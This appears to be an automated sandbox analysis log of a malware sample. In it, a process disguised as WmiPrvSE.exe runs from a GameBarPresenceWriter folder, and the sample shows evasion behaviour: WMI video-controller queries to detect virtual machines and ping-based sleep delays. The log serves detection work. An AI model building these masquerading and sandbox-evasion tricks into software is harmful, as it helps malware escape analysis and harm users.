Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Memory allocated: C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Memory allocated: 1AA60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1A720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1B0F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1410000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1B020000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: D40000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1AA90000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1120000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1AF70000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 14B0000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1B260000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 18A0000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: 1B2C0000 memory reserve \| memory write watch
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Memory allocated: B20000 memory reserve \| memory write watch
